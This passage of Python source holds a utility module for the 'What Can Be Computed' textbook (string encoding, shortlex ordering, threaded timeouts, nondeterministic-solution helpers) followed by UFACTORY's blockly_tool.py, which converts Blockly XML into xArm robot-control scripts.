consists of the length of the first string, followed by a space
character, followed by the two strings concatenated together.
Args:
inString1 (str): The first string to be encoded
inString2 (str): The second string to be encoded
Returns:
str: A single string encoding inString1 and inString2
Example:
>>> ESS('abc', 'defg')
'3 abcdefg'
"""
return str(len(inString1)) + " " + inString1 + inString2
def DESS(inString):
"""Decode a single string into two strings (inverse of ESS).
DESS is an acronym for DEcode from Single String. This function
uses the method suggested in the textbook for converting a single
string that encodes two strings back into the original two
strings. DESS is the inverse of the function ESS.
Args:
inString (str): The string to be decoded
Returns:
(str, str): A 2-tuple containing the two strings that were decoded from the input.
Example:
>>> DESS('3 abcdefg')
('abc', 'defg')
"""
# split on the first space character
(theLength, remainder) = inString.split(" ", 1)
inString1 = remainder[: int(theLength)]
inString2 = remainder[int(theLength) :]
return (inString1, inString2)
def randomAlphanumericString(length=None, maxLength=20):
"""Generate a random alphanumeric string.
This function generates and returns a random alphanumeric string,
where the length of the string can be specified or can also be
selected randomly. The individual characters in the string are
selected uniformly at random.
Args:
        length (int): The desired length of the string. Defaults to
            None. If None, the length of the string will be chosen
            uniformly at random between 0 and maxLength.
        maxLength: When the length of the string is chosen at random,
            the maximum length is maxLength. This parameter is only
            relevant if length is None.
Returns:
str: The randomly generated alphanumeric string.
"""
characters = "abcdefghijklmnopqstuvwxyzABCDEFGHIJKLMNOPQSTUVWXYZ0123456789"
    if length is None:
length = aRandom.randint(0, maxLength)
chosenCharacters = []
for i in range(length):
randomCharacter = aRandom.choice(characters)
chosenCharacters.append(randomCharacter)
return "".join(chosenCharacters)
def randomDigitalString(length=None, maxLength=20):
"""Generate a random string of numeric digits.
This function generates and returns a random string of numeric
digits, where the length of the string can be specified or can
also be selected randomly. The individual digits in the string are
selected uniformly at random, except that the first digit cannot
be 0.
Args:
        length (int): The desired length of the string. Defaults to
            None. If None, the length of the string will be chosen
            uniformly at random between 0 and maxLength.
        maxLength: When the length of the string is chosen at random,
            the maximum length is maxLength. This parameter is only
            relevant if length is None.
Returns:
str: The randomly generated string of digits.
"""
characters = "0123456789"
    if length is None:
length = aRandom.randint(0, maxLength)
chosenCharacters = []
for i in range(length):
randomCharacter = aRandom.choice(characters)
# first character must be nonzero
while i == 0 and randomCharacter == "0":
randomCharacter = aRandom.choice(characters)
chosenCharacters.append(randomCharacter)
return "".join(chosenCharacters)
def randomString(alphabet, length=None, maxLength=20):
"""Generate a random string of characters from a given up a bit.
This function generates and returns a random string of characters
from a given alphabet, where the length of the string can be
specified or can also be selected randomly. The individual
characters in the string are selected uniformly at random.
Args:
alphabet (list of characters): A list of characters in the
alphabet to be used.
        length (int): The desired length of the string. Defaults to
            None. If None, the length of the string will be chosen
            uniformly at random between 0 and maxLength.
        maxLength: When the length of the string is chosen at random,
            the maximum length is maxLength. This parameter is only
            relevant if length is None.
Returns:
str: The randomly generated string.
"""
characters = alphabet
    if length is None:
length = aRandom.randint(0, maxLength)
chosenCharacters = []
for i in range(length):
randomCharacter = aRandom.choice(characters)
chosenCharacters.append(randomCharacter)
return "".join(chosenCharacters)
def asciiAlphabetAsList():
"""Return a list consisting of the 128 ASCII characters"""
asciiAlphabet = []
for i in range(128):
asciiAlphabet.append(chr(i))
return asciiAlphabet
ASCII_ALPHABET = asciiAlphabetAsList()
"""A list consisting of the 128 ASCII characters"""
def geneticAlphabetAsList():
"""Return a list consisting of the 4 characters 'A', 'C', 'G', 'T'"""
return ["A", "C", "G", "T"]
def boolToYes(b):
"""Convert a Boolean input into 'yes' or 'no'
Args:
b (bool): The Boolean value to be converted
Returns:
str: 'yes' if b is True, and 'no' otherwise.
"""
if b:
return "yes"
else:
return "no"
def nextShortLex(s, alphabet):
"""Return the next string in shortlex ordering on a given alphabet.
Shortlex is an ordering that lists strings according to length,
with strings of the same length being ordered
lexicographically. This function takes a string on some particular
alphabet as input, and returns the next string on that alphabet in
the shortlex ordering.
Args:
s (str): The string whose successor will be returned.
alphabet (list of characters): A list of characters in the
alphabet to be used.
Returns:
str: The successor of s in the shortlex ordering, assuming the
given alphabet.
Example:
>>> nextShortLex('aab', ['a', 'b', 'c'])
'aac'
>>> nextShortLex('ccc', ['a', 'b', 'c'])
'aaaa'
"""
first = alphabet[0]
last = alphabet[-1]
if s == "":
return str(first)
chars = [c for c in s]
L = len(chars)
# The Boolean variable overflow will indicate whether or not this
# is the last string of the current length (and hence whether we
# need to "overflow" to the first string with length one greater)
overflow = True
for i in range(L - 1, -1, -1):
currentChar = chars[i]
if currentChar != last:
overflow = False
break
# Either we overflowed (and i=0), or we didn't overflow, in which
# case the value of i is now the index of the rightmost character
# that can be incremented. Let's remember all the needed
# information about that character.
incrementIndex = i
incrementChar = currentChar
alphabetIndex = alphabet.index(currentChar)
if overflow:
# Treat overflow as a special case and return a string of
# length L+1 consisting entirely of the first character in the
# alphabet.
return first * (L + 1)
else:
# We didn't overflow, so manipulate the array of characters to
# produce the next string in lexicographic order. The
# rightmost character that can be incremented gets
# incremented...
chars[incrementIndex] = alphabet[alphabetIndex + 1]
# ...then all the characters to the right of that roll over to
# the first character in the alphabet.
for j in range(incrementIndex + 1, L):
chars[j] = first
return "".join(chars)
def nextASCII(s):
"""Return the successor of ASCII string s in the shortlex ordering.
For a detailed explanation, see the documentation of
nextShortLex(). This function is the same as nextShortLex(), for
the special case where the alphabet is the ASCII alphabet.
Args:
s (str): The ASCII string whose successor will be returned.
Returns:
str: The successor of ASCII string s in the shortlex ordering.
"""
return nextShortLex(s, ASCII_ALPHABET)
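
# --- Editor's illustrative sketch (not part of the original WCBC materials). ---
# Starting from the empty string, repeatedly applying nextASCII() enumerates
# ASCII strings in shortlex order. The helper name below is invented for
# illustration only.
def _demoNextASCII():
    s = ""
    firstFew = []
    for _ in range(5):
        s = nextASCII(s)
        firstFew.append(s)
    # firstFew is now ['\x00', '\x01', '\x02', '\x03', '\x04']
    return firstFew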
# Enter supposedly infinite loop. In fact, we exit if the event
# haltComputations is signalled, or if the fixed timeout expires.
# This helps to prevent problems with automated testing of code that
# enters infinite loops.
def loop():
"""Enter an infinite loop, but with features that facilitate testing.
This function supposedly enters an infinite loop. The intention is
that it should be used for simulating infinite loops, but in fact
it is more sophisticated. The function waits on the
utils.haltComputations event, and exits immediately if that event
is signaled. This facilitates testing of code that deliberately
enters infinite loops. In addition, this function times out after
60 seconds. This prevents background threads looping indefinitely.
"""
timeout = 60 # one minute should be plenty
haltComputations.wait(timeout)
# reset the haltComputations event
haltComputations.clear()
def invokeAndStoreResult(fn, q, done, *inStrings):
"""Invoke a function and store its return value in a given queue.
Mostly intended as a private function used by
utils.runWithTimeout(). The invokeAndStoreResult() function
invokes a function (which itself is passed in as a parameter) with
certain arguments (also passed in as parameters), stores the
result in a queue data structure, then signals an event to declare
that it is finished. This makes it possible for other threads to
be aware of when the function has completed and for those threads
to obtain its return value.
Args:
fn (a function): The function that will be invoked.
q (a Python queue.Queue): A queue that will be used for storing the
return value. A queue is used because Python queues happen
to behave well in multithreaded environments. In fact, at
most one item will be stored in this queue.
done (a Python threading.Event): An event that will be
signaled when fn has returned.
*inStrings: A variable number of arguments that will be passed
on to fn.
"""
ret = fn(*inStrings)
q.put(ret)
done.set()
def runWithTimeout(timeout, fn, *inStrings):
"""Invoke a function with a timeout.
This invokes a function (which itself is passed in as a parameter)
with certain arguments (also passed in as parameters). If the
function completes within the given timeout, its return value is
returned. Otherwise, None is returned.
Args:
timeout (float): The number of seconds before the function
invocation times out. If None, this is set to a standard
value for running unit tests.
fn (a function): The function that will be invoked.
*inStrings: A variable number of arguments that will be passed
on to fn.
Returns:
object: None if fn times out, otherwise the return value of fn.
"""
    if timeout is None:
timeout = TEST_TIMEOUT
# a queue for storing the return value of fn
q = queue.Queue()
# an event for signaling when fn has completed
done = threading.Event()
# create and start a separate thread in which to invoke the
# function
t = threading.Thread(target=invokeAndStoreResult, args=(fn, q, done) + inStrings)
t.start()
# wait for either the function to complete, or the duration of the
# timeout, whichever is earlier
done.wait(timeout)
# If it's a long-running computation that knows about the
# haltComputations event, tell it to stop now.
haltComputations.set()
# Reset for future computations
haltComputations.clear()
# if the queue is empty, the function did not complete, so return
# None
if q.empty():
retVal = None
else:
retVal = q.get()
return retVal
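
# --- Editor's illustrative sketch (not part of the original WCBC materials). ---
# It demonstrates the intended use of runWithTimeout(): a quick computation
# returns its value, while a deliberately non-terminating computation (loop,
# defined above) is abandoned after the timeout and yields None. The helper
# name below is invented for illustration only.
def _demoRunWithTimeout():
    quick = runWithTimeout(5.0, len, "GAGA")  # completes quickly; returns 4
    slow = runWithTimeout(2.0, loop)          # never finishes on its own; returns None
    return (quick, slow)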
def formatASet(theSet):
"""Format a set of strings as a string.
The given set is returned enclosed by braces and with elements
separated by commas.
Args:
theSet (set of str): The set to be formatted.
Returns:
str: A string representing theSet, enclosed by braces and with
elements separated by commas.
Example:
>>> formatASet({'abc', 'd', 'ef'})
'{d,ef,abc}'
"""
return "{" + ",".join(theSet) + "}"
def formatSetOfSets(theSets):
"""Format a set of frozensets of strings as a single string.
Each frozenset of strings is formatted using utils.formatASet(),
and the resulting strings are separated by space characters.
Args:
theSets (set of frozensets of str): The set of frozensets to
be formatted.
Returns:
str: A string representing theSets.
Example:
>>> set1 = frozenset({'abc', 'd', 'ef'})
>>> set2 = frozenset({'w', 'xy', 'z'})
>>> formatSetOfSets({set1, set2})
'{ef,abc,d} {xy,z,w}'
"""
formattedSets = [formatASet(s) for s in theSets]
return " ".join(formattedSets)
def sortByNthElement(theList, N):
"""Sort a list of items by the Nth element of each item.
Args:
theList (iterable of indexable items): The list of items to be sorted.
N (int): The index of the elements that should be used for the sorting.
Returns:
list: A new list sorted in increasing order by the Nth element of each item in theList.
"""
return sorted(theList, key=lambda x: x[N])
def killAllThreadsAndExit():
"""Exit Python, which also kills all Python threads.
This is useful for debugging and in certain other situations,
since there is no reliable way to kill Python threads.
"""
# Best to flush any messages before we exit, otherwise they may
# not be printed.
sys.stdout.flush()
os._exit(0)
class NonDetSolution:
"""Manages solutions to nondeterministic programs.
NonDetSolution is a class that can be used to arrange for
nondeterministic (i.e. multithreaded) Python programs to return a
value. For an example of how to use it, see the program
ndContainsNANA.py, which is also explained in the book. The basic
idea is to create a single NonDetSolution object nds to be used by
the nondeterministic program. The nds object will be passed to
each thread created, then nds and the list of threads will be
passed to waitForOnePosOrAllNeg() in order to obtain the program's
solution.
"""
printLock = threading.Lock()
"""A static lock shared between all NonDetSolution objects -- the
intention is that this can be used for debugging. Specifically,
you can acquire the printLock, print some debugging information,
then release the lock.
"""
def __init__(self):
self.solution = "no"
"""str: Stores the solution to the problem being solved. By default,
it has the value 'no'."""
# This lock protects access to the above solution field.
self.solnLock = threading.Lock()
"""threading.Lock: protects access to the above solution field"""
self.done = threading.Event()
"""threading.Event: Will be used to signal when either a positive
solution has been found or all threads have terminated with
negative solutions."""
def waitUntilDone(self):
"""Wait until we receive the signal that a positive solution has been
found or all threads have terminated negatively."""
self.done.wait()
def setDone(self):
"""Send the signal that a positive solution has been found or all
threads have terminated negatively."""
self.done.set()
def setSolution(self, solution):
"""Set the solution to the given value, and signal if it's positive.
This is a setter for the solution attribute. In addition, if
the new value for the solution attribute is positive
(i.e. anything other than the string "no"), we signal this
object's event attribute, done. This will enable other threads
to become aware that a positive solution has been found.
"""
# We only take action for positive solutions. If the given
# solution is 'no', we leave the default value of 'no'
# untouched -- and if another thread has meanwhile set the
# solution to a positive value, we should certainly not set it
# back to 'no' because positive solutions take precedence
# anyway.
if solution != "no":
self.solnLock.acquire()
self.solution = solution
self.solnLock.release()
# Signal that a positive solution has been found.
self.setDone()
def getSolution(self):
"""Return the stored value of the solution."""
self.solnLock.acquire()
solution = self.solution
self.solnLock.release()
return solution
def waitForOnePosOrAllNeg(threads, nonDetSolution):
"""Wait until one of the threads terminates positively or all terminate negatively.
Each of the threads in the given list will be started. Each of
these threads must already possess a reference to the given
nonDetSolution instance, since this will be used to signal if and
when a positive solution is found. When a positive solution is
found by one of the threads, the value of that solution is
returned. Otherwise, we wait until threads terminate and then
return the negative solution, 'no'.
Args:
threads (list of threading.Thread): Threads that will be started.
nonDetSolution (NonDetSolution): A NonDetSolution object used
to store and manipulate the solution being computed by the
given threads.
Returns:
str: The solution that was found.
"""
# check to see if the number of threads is getting too big
maxThreads = 500
if len(threads) + threading.active_count() > maxThreads:
NonDetSolution.printLock.acquire()
print(
"Fatal error in waitForOnePosOrAllNeg: you attempted to run more than",
maxThreads,
"""threads simultaneously.
In theory this isn't a problem, but in practice your Python
implementation may encounter difficulties. To avoid these potential
problems, all threads will now be killed.""",
)
NonDetSolution.printLock.release()
killAllThreadsAndExit()
# start each thread
for t in threads:
# print('starting', t)
t.start()
# create and start yet another thread, whose job it will be to
# detect when all the other threads have terminated
allTerminatedThread = threading.Thread(target=waitAllTerminated, args=(threads, nonDetSolution))
allTerminatedThread.start()
nonDetSolution.waitUntilDone()
return nonDetSolution.getSolution()
def waitAllTerminated(threads, nonDetSolution):
"""Wait until all the given threads have terminated, then signal.
When all threads have terminated, signal this fact via the
nonDetSolution object.
Args:
threads (list of threading.Thread): Threads that will be waited for.
nonDetSolution (NonDetSolution): A NonDetSolution object used
to store and manipulate the solution being computed by the
given threads.
"""
# wait for each thread to complete
for t in threads:
t.join()
nonDetSolution.setDone()
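
# --- Editor's illustrative sketch (not part of the original WCBC materials). ---
# A minimal nondeterministic search in the style of ndContainsNANA.py: one
# thread per character position reports 'yes' through a shared NonDetSolution
# object if 'NANA' occurs at its position, and waitForOnePosOrAllNeg() collects
# the result. The helper name and the default input are invented for illustration.
def _demoNonDetSolution(inString="CAGNANAGGT"):
    nds = NonDetSolution()

    def checkAt(i):
        if inString[i:i + 4] == "NANA":
            nds.setSolution("yes")

    threads = [threading.Thread(target=checkAt, args=(i,)) for i in range(len(inString))]
    return waitForOnePosOrAllNeg(threads, nds)  # 'yes' for the default input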
class WcbcException(Exception):
"""A simple wrapper of the standard Python Exception class.
WcbcException instances are used to indicate unexpected or
unhandled situations within the WCBC package.
"""
def __init__(self, *args, **kwargs):
Exception.__init__(self, *args, **kwargs)
################################################################################
#### The following settings control testing and are not relevant for
#### running "normal" programs that aren't tests.
################################################################################
VERBOSE_TESTS = True
BRIEF_TESTS = True
NUM_BRIEF_TESTS = 1
TEST_TIMEOUT = 10.0
################################################################################
# tprint stands for "test print" -- for printing output in a test function
def tprint(*args, **kwargs):
"""Print output within a test function
"tprint" stands for "test print". This is a wrapper for the
standard Python print function. It prints nothing unless
VERBOSE_TESTS is True.
"""
if VERBOSE_TESTS:
print(*args, **kwargs)
sys.stdout.flush()
def isPrime(M):
"""Return True if integer M is prime, and False otherwise.
This is used for testing certain functions; see e.g. factor.py. A
simple, inefficient algorithm is employed.
"""
    if M < 2:
        return False
    for x in range(2, M):
        if M % x == 0:
            return False
return True
|
blockly_tool.py
|
#!/usr/bin/env python3
# Software License Agreement (BSD License)
#
# Copyright (c) 2019, UFACTORY, Inc.
# All rights reserved.
#
# Author: Vinman <vinman.wen@ufactory.cc> <vinman.cub@gmail.com>
try:
import xml.etree.cElementTree as ET
except ImportError:
import xml.etree.ElementTree as ET
import re
import sys
import json
import time
import random
from .blockly_highlight_block import HIGHLIGHT_BLOCKS
class BlocklyTool(object):
def __init__(self, path):
self.tree = ET.parse(path)
self.root = self.tree.getroot()
self.namespace = self.get_namespace()
self._ops = {
'EQ': '==',
'NEQ': '!=',
'LT': '<',
'LTE': '<=',
'GT': '>',
'GTE': '>='
}
self._ops2 = {
'===': '==',
'!==': '!=',
'>=': '>=',
'>': '>',
'<=': '<=',
'<': '<',
}
self._code_list = []
self._hasEvent = False
self._events = {}
self._funcs = {}
self._func_cls_exist = False
self._func_index = 0
self._index = -1
self._first_index = 0
self._is_insert = False
self.codes = ''
self._succeed = True
self._show_comment = False
self._highlight_callback = None
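    # Editor's note: the three properties below are post-increment counters.
    # `index` advances the cursor used with _insert_to_file() while the header
    # is being generated, and `first_index` additionally remembers where that
    # header ends, so that lines appended while self._is_insert is True are
    # inserted just after the initialization section rather than at the end.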
@property
def index(self):
self._index += 1
return self._index
@property
def func_index(self):
self._func_index += 1
return self._func_index
@property
def first_index(self):
self._first_index += 1
self._index += 1
return self._first_index
def _append_to_file(self, data):
if not self._is_insert:
self._code_list.append(data)
else:
self._code_list.insert(self.first_index, data)
def _insert_to_file(self, i, data):
self._code_list.insert(i, data)
def get_namespace(self):
try:
r = re.compile('({.+})')
if r.search(self.root.tag) is not None:
ns = r.search(self.root.tag).group(1)
else:
ns = ''
except Exception as e:
# print(e)
ns = ''
return ns
def get_node(self, tag, root=None):
if root is None:
root = self.root
return root.find(self.namespace + tag)
def get_nodes(self, tag, root=None, descendant=False, **kwargs):
if root is None:
root = self.root
nodes = []
if descendant:
func = root.iter
else:
func = root.findall
for node in func(self.namespace + tag):
flag = True
for k, v in kwargs.items():
if node.attrib[k] != v:
flag = False
if flag:
nodes.append(node)
return nodes
def _init_py3(self, arm=None, init=True, wait_seconds=1, mode=0, state=0, error_exit=True, stop_exit=True):
self._insert_to_file(self.index, '#!/usr/bin/env python3')
self._insert_to_file(self.index, '# Software License Agreement (BSD License)\n#')
self._insert_to_file(self.index, '# Copyright (c) {}, UFACTORY, Inc.'.format(time.localtime(time.time()).tm_year))
self._insert_to_file(self.index, '# All rights reserved.\n#')
self._insert_to_file(self.index, '# Author: Vinman <vinman.wen@ufactory.cc> <vinman.cub@gmail.com>\n')
self._insert_to_file(self.index, '"""')
self._insert_to_file(self.index, '# Notice')
self._insert_to_file(self.index, '# 1. Changes to this file on Studio will not be preserved')
self._insert_to_file(self.index, '# 2. The next conversion will overwrite the file with the same name')
self._insert_to_file(self.index, '"""')
self._insert_to_file(self.index, 'import sys')
self._insert_to_file(self.index, 'import math')
self._insert_to_file(self.index, 'import time')
self._insert_to_file(self.index, 'import datetime')
self._insert_to_file(self.index, 'import random')
self._insert_to_file(self.index, 'import traceback')
self._insert_to_file(self.index, 'import threading\n')
self._insert_to_file(self.index, '"""')
self._insert_to_file(self.index, '# xArm-Python-SDK: https://github.com/xArm-Developer/xArm-Python-SDK')
self._insert_to_file(self.index, '# git clone git@github.com:xArm-Developer/xArm-Python-SDK.git')
self._insert_to_file(self.index, '# cd xArm-Python-SDK')
self._insert_to_file(self.index, '# python setup.py install')
self._insert_to_file(self.index, '"""')
self._insert_to_file(self.index, 'try:')
self._insert_to_file(self.index, ' from xarm.tools import gaussian_surface_bug')
self._insert_to_file(self.index, 'except:')
self._insert_to_file(self.index, ' pass')
self._insert_to_file(self.index, 'from xarm import version')
self._insert_to_file(self.index, 'from xarm.wrapper import XArmAPI\n')
# self._insert_to_file(self.index, 'locals_keys = list(locals().keys())\n\n')
self._insert_to_file(self.index, 'def pprint(*args, **kwargs):')
self._insert_to_file(self.index, ' try:')
self._insert_to_file(self.index, ' stack_tuple = traceback.extract_stack(limit=2)[0]')
self._insert_to_file(self.index, ' print(\'[{}][{}] {}\'.format('
'time.strftime(\'%Y-%m-%d %H:%M:%S\', time.localtime(time.time())), '
'stack_tuple[1], \' \'.join(map(str, args))))')
self._insert_to_file(self.index, ' except:')
# self._insert_to_file(self.index, ' pass')
self._insert_to_file(self.index, ' print(*args, **kwargs)\n')
self._insert_to_file(self.index, 'pprint(\'xArm-Python-SDK Version:{}\'.format(version.__version__))\n')
# if self._highlight_callback is None:
# self._insert_to_file(self.index, 'highlight_callback = lambda x:x')
if arm is None:
self._insert_to_file(self.index, 'arm = XArmAPI(sys.argv[1])')
elif isinstance(arm, str):
self._insert_to_file(self.index, 'arm = XArmAPI(\'{}\')'.format(arm))
if init:
self._insert_to_file(self.index, 'arm.clean_warn()')
self._insert_to_file(self.index, 'arm.clean_error()')
self._insert_to_file(self.index, 'arm.motion_enable(True)')
self._insert_to_file(self.index, 'arm.set_mode({})'.format(mode))
self._insert_to_file(self.index, 'arm.set_state({})'.format(state))
if wait_seconds > 0:
self._insert_to_file(self.index, 'time.sleep({})\n'.format(wait_seconds))
variables = self.parse_vars()
variables = {var: 0 for var in variables}
self._insert_to_file(self.index, 'variables = {}'.format(variables))
self._insert_to_file(self.index, 'params = {\'speed\': 100, \'acc\': 2000, '
'\'angle_speed\': 20, \'angle_acc\': 500, '
'\'events\': {}, \'variables\': variables, '
'\'callback_in_thread\': True, \'quit\': False}')
if error_exit:
self._insert_to_file(self.index, '\n\n# Register error/warn changed callback')
self._insert_to_file(self.index, 'def error_warn_change_callback(data):')
self._insert_to_file(self.index, ' if data and data[\'error_code\'] != 0:')
# self._insert_to_file(self.index, ' arm.set_state(4)')
self._insert_to_file(self.index, ' params[\'quit\'] = True')
self._insert_to_file(self.index, ' pprint(\'err={}, quit\'.format(data[\'error_code\']))')
self._insert_to_file(self.index, ' arm.release_error_warn_changed_callback(error_warn_change_callback)')
self._insert_to_file(self.index, 'arm.register_error_warn_changed_callback(error_warn_change_callback)')
if stop_exit:
self._insert_to_file(self.index, '\n\n# Register state changed callback')
self._insert_to_file(self.index, 'def state_changed_callback(data):')
self._insert_to_file(self.index, ' if data and data[\'state\'] == 4:')
self._insert_to_file(self.index, ' if arm.version_number[0] >= 1 and arm.version_number[1] >= 1 and arm.version_number[2] > 0:')
self._insert_to_file(self.index, ' params[\'quit\'] = True')
self._insert_to_file(self.index, ' pprint(\'state=4, quit\')')
self._insert_to_file(self.index, ' arm.release_state_changed_callback(state_changed_callback)')
self._insert_to_file(self.index, 'arm.register_state_changed_callback(state_changed_callback)')
self._insert_to_file(self.index, '\n\n# Register counter value changed callback')
self._insert_to_file(self.index, 'if hasattr(arm, \'register_count_changed_callback\'):')
self._insert_to_file(self.index, ' def count_changed_callback(data):')
self._insert_to_file(self.index, ' if not params[\'quit\']:')
self._insert_to_file(self.index, ' pprint(\'counter val: {}\'.format(data[\'count\']))')
self._insert_to_file(self.index, ' arm.register_count_changed_callback(count_changed_callback)')
self._insert_to_file(self.index, '\n\n# Register connect changed callback')
self._insert_to_file(self.index, 'def connect_changed_callback(data):')
self._insert_to_file(self.index, ' if data and not data[\'connected\']:')
self._insert_to_file(self.index, ' params[\'quit\'] = True')
self._insert_to_file(self.index, ' pprint(\'disconnect, connected={}, reported={}, quit\'.format(data[\'connected\'], data[\'reported\']))')
        self._insert_to_file(self.index, ' arm.release_connect_changed_callback(connect_changed_callback)')
self._insert_to_file(self.index, 'arm.register_connect_changed_callback(connect_changed_callback)\n')
self._first_index = self._index
def _finish_py3(self, error_exit=True, stop_exit=True):
if self._hasEvent:
self._append_to_file('\n# Main loop')
self._append_to_file('while arm.connected and arm.error_code == 0 and not params[\'quit\']:')
self._append_to_file(' time.sleep(0.5)')
self._append_to_file('\n# release all event')
self._append_to_file('if hasattr(arm, \'release_count_changed_callback\'):')
self._append_to_file(' arm.release_count_changed_callback(count_changed_callback)')
if error_exit:
            self._append_to_file('arm.release_error_warn_changed_callback(error_warn_change_callback)')
if stop_exit:
self._append_to_file('arm.release_state_changed_callback(state_changed_callback)')
        self._append_to_file('arm.release_connect_changed_callback(connect_changed_callback)\n')
def to_python(self, path=None, arm=None, init=True, wait_seconds=1, mode=0, state=0,
error_exit=True, stop_exit=True, show_comment=False, **kwargs):
self._show_comment = show_comment
self._succeed = True
self._highlight_callback = kwargs.get('highlight_callback', None)
self._init_py3(arm=arm, init=init, wait_seconds=wait_seconds, mode=mode, state=state, error_exit=error_exit, stop_exit=stop_exit)
self.parse()
self._finish_py3(error_exit=error_exit, stop_exit=stop_exit)
self.codes = '\n'.join(self._code_list)
if path is not None:
with open(path, 'w', encoding='utf-8') as f:
f.write('{}\n'.format(self.codes))
return self._succeed
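    # Editor's usage sketch (illustrative; the .xml and .py paths and the IP
    # address below are hypothetical):
    #
    #   tool = BlocklyTool('/path/to/project.xml')
    #   ok = tool.to_python(path='project.py', arm='192.168.1.100', show_comment=True)
    #   # tool.codes holds the generated script; ok is False if any block type
    #   # could not be converted.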
def parse_vars(self):
var_list = []
variables = self.get_nodes('variables')
for vars in variables:
for variable in self.get_nodes('variable', root=vars):
var_list.append(variable.text)
return var_list
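    # Editor's note: parse() walks the Blockly XML tree. Top-level <block>
    # elements (and blocks nested under a <statement>) each start a chain;
    # later blocks in a chain are reached through the parent block's <next>
    # element. Each block type is dispatched to a matching _handle_<type>()
    # method; an unknown type marks the conversion as failed (_succeed = False).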
def parse(self, root=None, prefix='', arg_map=None):
blocks = self.get_nodes('block', root=root)
if blocks:
for block in blocks:
is_statement = root is None
if root is not None:
if root.tag == self.namespace + 'statement':
is_statement = True
while block is not None:
if not is_statement:
block = self.get_node('next', root=block)
if not block:
break
block = self.get_node('block', root=block)
else:
is_statement = False
if block.attrib.get('disabled', False):
continue
func = getattr(self, '_handle_{}'.format(block.attrib['type']), None)
if func:
if self._highlight_callback is not None:
if block.attrib['type'] in HIGHLIGHT_BLOCKS:
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} highlight_callback(\'{}\')'.format(prefix, block.attrib['id']))
# if block.attrib['type'] not in ['procedures_defnoreturn', 'procedures_defreturn', 'controls_if']:
# self._append_to_file('{}highlight_callback(\'{}\')'.format(prefix, block.attrib['id']))
func(block, prefix, arg_map=arg_map)
else:
self._succeed = False
print('block {} can\'t convert to python code'.format(block.attrib['type']))
# block = self.get_node('block', root=root)
# while block is not None:
# if not is_statement:
# block = self.get_node('next', root=block)
# if not block:
# break
# block = self.get_node('block', root=block)
# else:
# is_statement = False
# if block.attrib.get('disabled', False):
# continue
# func = getattr(self, '_handle_{}'.format(block.attrib['type']), None)
# if func:
# func(block, prefix)
# else:
# print('block {} can\'t convert to python code'.format(block.attrib['type']))
def __check_is_quit(self, prefix):
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
return ' {}'.format(prefix)
def _handle_set_speed(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
if field is not None:
value = field.text
else:
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}params[\'speed\'] = {}'.format(prefix, value))
def _handle_set_acceleration(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
if field is not None:
value = field.text
else:
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}params[\'acc\'] = {}'.format(prefix, value))
def _handle_set_angle_speed(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
if field is not None:
value = field.text
else:
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}params[\'angle_speed\'] = {}'.format(prefix, value))
def _handle_set_angle_acceleration(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
if field is not None:
value = field.text
else:
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}params[\'angle_acc\'] = {}'.format(prefix, value))
def _handle_set_counter_increase(self, block, prefix='', arg_map=None):
# field = self.get_node('field', root=block)
# if field is not None:
# value = field.text
# else:
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set counter increase'.format(prefix))
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}arm.set_counter_increase()'.format(prefix))
def _handle_set_counter_reset(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# set counter reset'.format(prefix))
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}arm.set_counter_reset()'.format(prefix))
def _handle_reset(self, block, prefix='', arg_map=None):
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.reset()'.format(prefix))
def _handle_sleep(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
value = self.__get_block_val(value, arg_map=arg_map)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set pause time'.format(prefix))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_pause_time({})'.format(prefix, value))
def _handle_move(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
orientation = fields[0].text
wait = fields[1].text == 'TRUE'
value = fields[2].text
if orientation == 'forward':
param = 'x'
elif orientation == 'backward':
param = 'x'
value = '-{}'.format(value)
elif orientation == 'left':
param = 'y'
elif orientation == 'right':
param = 'y'
value = '-{}'.format(value)
elif orientation == 'up':
param = 'z'
elif orientation == 'down':
param = 'z'
value = '-{}'.format(value)
else:
return
if self._show_comment:
self._append_to_file('{}# relative move'.format(prefix))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_position({}={}, speed=params[\'speed\'], mvacc=params[\'acc\'], '
'relative=True, wait={})'.format(prefix, param, value, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_position, code={{}}\'.format(code))'.format(prefix))
def _handle_move_arc_to(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
p_block = self.get_node('block', root=value)
fields = self.get_nodes('field', root=p_block)
values = []
for field in fields[:-2]:
values.append(float(field.text))
radius = float(fields[-2].text)
wait = fields[-1].text == 'TRUE'
if self._show_comment:
self._append_to_file('{}# move{}line and {}'.format(
prefix, ' arc ' if float(radius) >= 0 else ' ', 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_position(*{}, speed=params[\'speed\'], mvacc=params[\'acc\'], '
'radius={}, wait={})'.format(prefix, values, radius, wait))
